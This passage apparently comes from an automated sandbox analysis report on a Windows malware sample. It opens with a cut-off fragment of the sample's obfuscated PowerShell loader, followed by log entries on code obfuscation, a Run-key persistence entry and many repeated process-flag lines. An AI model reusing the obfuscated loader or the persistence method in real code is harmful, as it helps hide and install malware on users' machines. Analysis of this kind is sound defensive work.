NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BAB7958 push ebx; retf 7_2_00007FFD9BAB796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BAB00BD pushad ; iretd 7_2_00007FFD9BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB847BB push es; iretd 7_2_00007FFD9BB847BC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB84B35 push es; iretd 7_2_00007FFD9BB84B62
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB84EED push es; iretd 7_2_00007FFD9BB84F6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB82AC5 push edx; retf 7_2_00007FFD9BB82AC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB848F5 push es; iretd 7_2_00007FFD9BB848F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9BB854CE push es; iretd 7_2_00007FFD9BB854CF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04743AD9 push ebx; retf 10_2_04743ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_076508C2 push eax; mov dword ptr [esp], ecx 10_2_07650AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B309AD push ecx; mov dword ptr [esp], ecx 15_2_23B309B6
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_04C209AD push ecx; mov dword ptr [esp], ecx 20_2_04C209B6
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009DB185 push esi; iretd 20_2_009DB186
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009DB2C0 push cs; iretd 20_2_009DB2C1
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009DB663 push cs; retf 20_2_009DB664
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E07EB push ecx; ret 20_2_009E07EC
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E0899 push ebx; iretd 20_2_009E089A
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E8A80 push esp; retf 20_2_009E8AAA
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009E0D40 push esp; ret 20_2_009E0D57
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D1E18 push ebp; retf 20_2_009D1E1D
Source: C:\Windows\SysWOW64\clip.exe Code function: 20_2_009D3E53 push es; ret 20_2_009D3E56
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
